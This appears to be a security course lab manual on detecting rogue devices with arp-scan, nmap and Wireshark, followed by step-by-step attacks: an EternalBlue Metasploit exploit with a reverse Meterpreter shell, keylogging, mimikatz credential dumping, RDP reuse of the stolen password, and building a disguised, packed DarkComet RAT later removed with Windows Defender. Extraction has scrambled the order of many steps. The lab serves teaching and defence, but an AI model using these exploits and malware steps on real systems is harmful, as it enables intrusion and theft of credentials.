Detecting Malware and Unauthorized

Devices

Introduction

Overview

The purpose of this lab is to perform to understand the security risk associated with rogue

devices and malware by learning active and passive scanning techniques. Students also

will craft, deploy, and detect malware on a machine on a network. 

outcomes

In this lab, you will learn to:

Wireshark A free and open source protocol analyzer, which will allow a user to

capture network trafﬁc or to analyze a capture ﬁle.

Zenmap A GUI front end for nmap that will allow you to scan for open ports and

services.

Metasploit A framework that contains exploits for various information systems.

nmap A port scanner which will indicate whether ports are open or closed on a

remote system.

TCP Transmission Control Protocol is a network protocol designed to send and

ensure end-to-end delivery of data packets over the Internet.

Do active and passive scanning using nmap

Detect rouge devices on the network using active and passive tools

Craft, deploy, and detect malware.

Key Term Description

Reading Assignment

Introduction

The purpose of this lab is to understand the security risk associated with rogue devices

and malware by learning active and passive scanning techniques. Students also will craft,

deploy, and detect malware on a machine on a network.

In this lab, you will learn to:

Perform active and passive scanning using Nmap.

Detect rouge devices on the network using active and passive tools.

Craft, deploy, and detect malware.

Figure 1 shows the lab topology. In the lab topology, you will learn how to detect those

three rogue devices on the different networks.

ifconﬁg

The ifconﬁg command is a terminal tool in Linux that enumerates all the interfaces on a

system. The ifconﬁg command is also used to conﬁgure interface on a Linux machine.

In this lab, you will use ifconﬁg command to ﬁnd the three networks that are shown in

Figure 1 that you will use to do active and passive scanning with Nmap and arp-scan.

Finding Rogue Devices with arp-scan and Nmap

Two ways to ﬁnd rogue devices on the network include arp-scan and Nmap. Rogue

devices connect to your network illegally to do harm to your network.

arp-scan is a command-line tool for system discovery and ﬁngerprinting. It constructs and

sends Address Resolution Protocol (ARP) requests to the speciﬁed Internet Protocol (IP)

addresses and displays any responses that are received.

You can also use Nmap to do system discovery and ﬁngerprinting. This lab explores the

two methods of locating rogue devices on the network.

Active, Passive, and Hybrid Scanning with Nmap

The three scanning techniques that are widely used by Nmap are active scanning, passive

scanning, and hybrid scanning. Active scanning is the technique where Nmap sends

packets to all the hosts on a network or subnet and waits for responses from them.

Passive scanning is done by examining packets sent from other nodes on a network or

subnet. Hybrid scanning is the technique where Nmap sends one or more initial packets

and then uses passive scanning to search for responses from the target host.

Wireshark—Capturing Packets

Wireshark is a network protocol analyzer. The graphical user interface (GUI) is shown in

Figure 2. It allows you to inspect and capture packets on your network. It allows you to

inspect the trafﬁc that is transmitting on your network. In this lab, you use Wireshark to

capture and investigate packets to discover a rogue system on the network and the type

of system it is.

Keyloggers

A keylogger program captures everything that a user enters on a computer keyboard.

Kali Linux/Metasploit

Kali Linux is a Linux distribution created for digital forensics and penetration testing.

Metasploit is a penetration testing framework which comes preloaded with Kali Linux. Kali

Linux, along with Metasploit, provides tools for penetration testers to improve security

assessments and awareness. This lab uses Kali and Metasploit to explore malware.

Meterpreter

Meterpreter is a Metasploit attack payload that provides an interactive shell to the victim

machine using Metasploit. In this lab, you will use keyscan_dump (keylogger) on a victim

computer to capture keystrokes.

Nmap/Zenmap

Nmap is an open-source network vulnerability scanner used to discover hosts and open

ports/services. Zenmap is the GUI to Nmap. Figure 3 shows the GUI for Zenmap.

Craft, Deploy, and Detect Malware

DarkComet is a Trojan horse which is a type of malware that masquerades as a valid

application to persuade a victim to install it and/or launch it. Trojans spread through social

engineering and brute force hacking of systems. In this lab, you use a remote access

Trojan, called DarkComet. DarkComet is a command and control (often referred to as a

C&C) malware. It allows you to create a viable looking application that acts as a server to

the DarkComet client. Once the malware is installed, the DarkComet client can

compromise a system remotely. It sends commands to the server, and it has full access to

the system to do what it wants. In this lab, you craft, deploy, and detect the DarkComet

malware. You will detect malware using Windows Defender on a Windows machine.

CONCLUSION:

In this lab, you will learn active and passive scanning techniques to detect rogue devices

using Nmap and arp-scan and also to craft DarkComet malware that will be detected with

Windows Defender.

Determining the Network Ranges

Click on the Kali Linux icon on the topology. Type root for the Username and

click Next.

For the Password, type toor (root spelled backward) and click the Sign In

button.

Note: The password of toor will not be displayed when you type it for security

purposes.

Click the black and white icon (second from the top) to launch the Linux terminal.

root@kali:~# ifconfig

Type the following command to view all of the IP addresses. Press Enter.

CHALLENGE

This Kali system is connected to all three of the company’s

network. Your job is to determine if any rogue machines are

present on the network by using a combination of active and

passive scanning tools.

Type the following command to view the IP address of the ﬁrst network. Press

Enter.

root@kali:~# ifconfig eth0

root@kali:~# ifconfig eth1

root@kali:~# ifconfig eth2

Type the following command to view the IP address of the second network. Press

Enter.

Type the following command to view the IP address of the third network. Press

Enter.

Below is a summary of the three networks that your Kali system is

connected to. The networks are:

Network IP Range

Network 1 192.168.1.0/24

Network 2 172.16.1.0/24

Network 3 10.0.0.0/24

CHALLENGE

DISCUSSION QUESTIONS:

What is the command-line tool used to determine the networks to scan?

What is the third subnet you uncovered?

Active and Passive Scanning

First, we will focus on the ﬁrst network segment labeled Network

root@kali:~# ifconfig eth0

Type the following command to view the IP address of the ﬁrst network. Press

Enter.

root@kali:~# ping 192.168.1.1 -c 4

root@kali:~# ping 192.168.1.175 -c 4

Type the following command to verify that your device can ping the ﬁrewall on

network segment 1. Press Enter.

Type the following command to verify that your device can ping the Windows 8.1

workstation on network segment 1. Press Enter.

We will now use arp-scan and zenmap, two active scanning tools,

to determine if any rogue devices exist on the network.

root@kali:~# arp-scan192.168.1.0/24

Let’s examine the results of the scan of network segment one in

the chart below:

Network IP Range

192.168.1.1 ﬁrewall

192.168.1.175 Windows 8.1 Workstation

192.168.1.199 Rogue Device

The next thing we will do is determine more information about the

rogue device detected on the network.

CHALLENGE

root@kali:~# zenmap



Type the following command to scan the Network 1 segment for active hosts:

Press Enter.

Type the following command to open Zenmap. Press Enter. After Zenmap opens,

type 192.168.1.0/24in the Target box and then click the Scan button to launch

an intense scan.

After the scan is complete, you will see three hosts listed in the

left-hand pane.

Click on the fourth host (which is the rogue device) and click the host details

pane. Notice that the device has been running Linux and has not been turned on

long.

We will now save this scan on your local system so you can e-mail it to your

supervisor. To save the scan, go to Scan from the menu bar and select Save Scan.

For the ﬁlename, type rogue_device_network1.xml and click the Save button.

Select Scan from the menu bar and then select Quit to close Zenmap.

Next, we will focus on the second network segment labeled

Network 2:

root@kali:~# ifconfig eth1

Type the following command to view the IP Address of the second network. Press

Enter.

Type the following command to verify that your device can ping the Windows

server on network segment 2. Press Enter.

root@kali:~# ping 172.16.1.100 -c 4

We will now use nmap to perform an active scan to determine if

any rogue devices exist on the network.

root@kali:~# nmap -sP 172.16.1.0/24

Let’s examine the results of the scan of network segment 2 in the

chart below:

Network IP Range

172.16.1.100 Windows Server

172.16.1.50 Kali Linux

To avoid capturing trafﬁc from other networks, we will shut the

other two interfaces on Kali down.

CHALLENGE

Type the following command to scan the Network 2 segment for active hosts.

Press Enter.

Note: No rogue devices were detected on the network using active scanning

measures.

root@kali:~# ifconfig eth2down

root@kali:~# ifconfig

root@kali:~# wireshark

Type the following command to shut down the interface connected to the ﬁrst

network. Press Enter.

Type the following command to view all of the IP addresses. Press Enter. (Notice

that only eth1 is listed.)

Type the following command and press Enter to open Wireshark.

Select Capture from the Wireshark menu and choose Options.

Uncheck the box in front of any. Click Start.

After a short while, packets should start appearing in the packet

list.

According to the information, there is a rogue system with the

following information:

IP ADDRESS: 169.254.1.101

Computer name: ROGUETWO-WIN10

It may take up to 10 minutes for the needed packet to appear.

Click the stop button to stop the capture.

Click File and go to Quit to exit Wireshark. When prompted, choose Quit without

Saving.

root@kali:~# ifconfig eth1 169.254.1.1

root@kali:~# nmap -O169.254.1.101

Type the following command to set the IP address to the same subnet as the

rogue device. Press Enter.

Type the following command to scan the device and determine the operating

system. Press Enter.

CHALLENGE

The rogue device on Network 2 is running Windows 10. Next, we

will focus on the third network segment labeled Network 3:

To avoid capturing trafﬁc from other networks, we will shut the

other interfaces on Kali down.

root@kali:~# ifconfig eth1 down

root@kali:~# ifconfig eth2 up

Type the following command to shut down the interface

connected to the second network. Press Enter.

Type the following command to bring up the interface connected to the third

network. Press Enter.

root@kali:~# ifconfig eth2

root@kali:~# ifconfig

Type the following command to view the IP address of the third network. Press

Enter.

Type the following command to view all of the IP Addresses. Press Enter. (Notice

that only eth2 is listed.)

Type the following command to verify that your device can ping the Windows 10

system on network segment 3. Press Enter.

root@kali:~# ping 10.0.0.20 -c 4

We will now use nmap to perform an active scan to determine if

any rogue devices exist on the network.

root@kali:~# nmap –sP 10.0.0.0/24

Let’s examine the results of the scan of network segment 3 in the

chart below:

Network IP Range

10.0.0.20 Windows 10

10.0.0.50 Kali Linux

Type the following command to scan the Network 3 segment for active hosts.

Press Enter.

Note: No rogue devices were detected on the network using active scanning

measures.

Type the following command and press Enter to open Wireshark.

root@kali:~# wireshark

Select Capture from the Wireshark menu and choose Options.

After a short while, packets should start appearing in the packet list.

According to the information, there is a rogue system with the

following information:

IP ADDRESS: 169.254.2.202

Computer name: ROGUE3-WIN7

Uncheck the box in front of any. Click Start.

It may take up to 10 minutes for the needed packet to appear.

Click the stop button to stop the capture.

Click File and go to Quit to exit Wireshark. When prompted, choose Quit without

Saving.

root@kali:~# ifconfig eth2 169.254.2.1

root@kali:~# nmap –O169.254.2.202

Type the following command to set the IP address to the same subnet as the

rogue device. Press Enter.

Type the following command to scan the device and determine the operating

system. Press Enter.

The rogue device on Network 3 is running Windows 7 SP 0.

CHALLENGE

DISCUSSION QUESTIONS:

Keyloggers

What is the command to use arp to determine a rogue device on a network?

What is the gui version of nmap?

What is wireshark?

Type the following command to restart the system and reset all of the interfaces.

Press Enter.

root@kali:~# init 6

Click on the Kali Linux icon on the topology. Type root for the Username and

click Next.

For the Password, type toor (root spelled backwards) and click the Sign In

button.

Note: The password of toor will not be displayed when you type it for security

purposes.

Click the black and white icon (second from the top) to launch the Linux terminal.

root@kali:~# ifconfig

Type the following command to view all of the IP addresses. Press Enter.

root@kali:~# nmap -A 172.16.1.100

Type the following command to determine if the server is vulnerable to the Eternal

Blue exploit. Press Enter.

CHALLENGE

root@kali:~# msfdb init

root@kali:~# msfconsole

Type the following command to initialize the database for metasploit. Press Enter.

Type the following command to start the metasploit console. Press Enter.

msf5 > use exploit/windows/smb/ms17_010_psexec

msf5 exploit (windows/smb/ms17_010_psexec) > set lhost 172.16.1.50

msf5 exploit (windows/smb/ms17_010_psexec) > set rhost 172.16.1.100

Type the following command to use the Eternal Blue exploit. Press Enter.

Type the following command to set the local host. Press Enter.

Type the following command to set the remote host. Press Enter.

msf5 exploit (windows/smb/ms17_010_psexec) > set payload

windows/meterpreter/reverse_tcp

msf5 exploit (windows/smb/ms17_010_psexec) > exploit

meterpreter> getsystem

meterpreter> getuid

Type the following command to select the payload. Press Enter.

Type the following command to exploit the target. Press Enter.

Type the following command within the meterpreter prompt to securethe

appropriatelevel of access. Press Enter.

Type the following command within the meterpreter prompt to determine the level

of access. Press Enter.

meterpreter> ps

Type the following command within the meterpreter prompt to list processes.

Press Enter.

Click on the Windows Server icon in the network topology. After the machine

ﬁnishes booting, click the Send Ctrl+Alt+Delete button in the upper right corner.

Log on as administrator with the password of P@ssw0rd and then click the arrow.

Note: The password of P@ssw0rd will not be displayed when you type it for

security purposes.

Double-click on the Command Prompt shortcut on the Windows Server desktop.

CHALLENGE

meterpreter> ps

Switch back to the Kali machine. Type the following command within the

meterpreter prompt to list processes. Press Enter.

Notice that the administrator is now listed. Find the ﬁrst number to the right of the

cmd.exe process.

Note: The number will be different than the one displayed in the example.

meterpreter> migrate 3792

meterpreter> getuid

meterpreter> keyscan_start

C:\Windows\System32>ipconfig /all

Type the following command within the meterpreter prompt to migrate to the

cmd.exe process. Press Enter.

Note: The number will be different than the one displayed in the example.

Type the following command within the meterpreter prompt to determine the level

of access. Press Enter.

Type the following command within the meterpreter prompt to start the

keylogger. Press Enter.

Switch back to the Windows server. Type the following command within the

command prompt to view your IP Address. Press Enter.

C:\Windows\System32>dir c:\

Type the following command within the command prompt to view ﬁles and

folders. Press Enter.

Open Chrome on the desktop and visit the following URL: 127.0.0.1:2222.

Type an e-mail address and a password and then click Log In.

Note: It is not the real Facebook page, so you can type anything you want.

meterpreter> keyscan_dump

meterpreter> load mimikatz

meterpreter> kerberos

Type the following command within the meterpreter prompt to start the

keylogger. Press Enter.

Type the following command within the meterpreter prompt to load mimikatz.

Press Enter.

Type the following command within the meterpreter prompt to dump the

passwords.

CHALLENGE

DISCUSSION QUESTIONS:

Examining Malware

Building and Deploying the Malware

What is the name of the keylogger used to capture keystrokes on a machine?

What is meterpreter?

Click on the Windows 8.1 icon on the topology.

Double-click on the Malware folder on the Windows 8.1 desktop.

Highlight the DarkComet.7z ﬁle within the Malware folder. Right-click on 7-Zip

and select Extract to “DarkComet\”.

Double-click on DarkComet.exe to launch the program.

Click Allow access when you receive a Windows Security Alert.

From the DarkComet-RAT menu bar, select Listen to new port (+Listen).

Type 443 in the Listen port box and click the Listen button.

From the DarkComet-RAT menu bar, click Server module (657.50KB), and then

select Full editor (Expert).

Click on Network Settings. When this opens, for IP/DNS, type 192.168.1.175

(the IP address of the Windows 8.1 machine), and for Port, type 443(almost

always allowed out). Then click ADD.

Click Choose Icon from the list. Select Custom icon. Choose the Firefox icon.

Click Stub Finalization. For the Compress Executable (Pack), select UPX (Ultimate

Packer Executable). Click Build The Stub to create the malware payload.

Click the link to the Desktop. For the File name, type firefox and click the Save

button.

You should see ﬁrefox.exe malware on your desktop. Right-click on the ﬁle and

select Copy.

Click on the X in the upper right-hand corner to close the Create a new stub

program.

Double-click the cmd-Shortcut link on the external Windows 8.1 desktop.

C:\>nmap 172.16.1.100 -p 3389

CHALLENGE

Type the following command and press Enter to determine if RDP is open on

Windows Server.

Type the following command and press Enter to launch the Microsoft Terminal

Service Client.

C:\>mstsc

If you recall earlier, we stole the password to the system.

In the Computer box, type 172.16.1.100 and then click the Connect button.

For the username, type administrator, and for the password, type P@ssw0rd.

Click OK.

Note: The password of P@ssw0rd will not be displayed when you type it for

security purposes.

Click Yes to the Remote Desktop Connection warning screen.

The remote Windows 2008 R2 Server desktop will now be

displayed on your machine.

Right-click on the Windows Server desktop you are connected to and click Paste.

Double-click on the malicious ﬁle.

The connection to the victim will be displayed in the DarkComet-

RAT console.

Click the Minimizeline on the 172.16.1.100 pane to minimize the Windows Server.

C:\>nmap 10.0.0.20 -p 3389

C:\>mstsc

Type the following command and press Enter to determine if RDP is open on

Windows 10.

Type the following command and press Enter to launch the Microsoft Terminal

Service Client.

If you recall earlier, we stole the password to the server which is

also likely used on the client.

In the Computer box, type 10.0.0.20 and then click the Connect button.

For the username, type administrator, and for the password, type P@ssw0rd.

Click OK.

Note: The password of P@ssw0rd will not be displayed when you type it for

security purposes.

Click Yes to the Remote Desktop Connection warning screen.

The remote Windows 10 Desktop will now be displayed on your machine.

Right-click on the Windows 10 Desktop you are connected to and click Paste.

Clickin the Windows Search Box and type Windows Defender. Click the

Windows Defender App.

In Windows Defender, click the History tab and then click View details.

In Windows Defender, scroll down to view the malware name. Click the Remove

all button.

CHALLENGE

DISCUSSION QUESTIONS:

Note: Press the STOP button to complete the lab.

What is the name of the malware that you use to craft and deploy?

How was the malware detected on the Windows machine?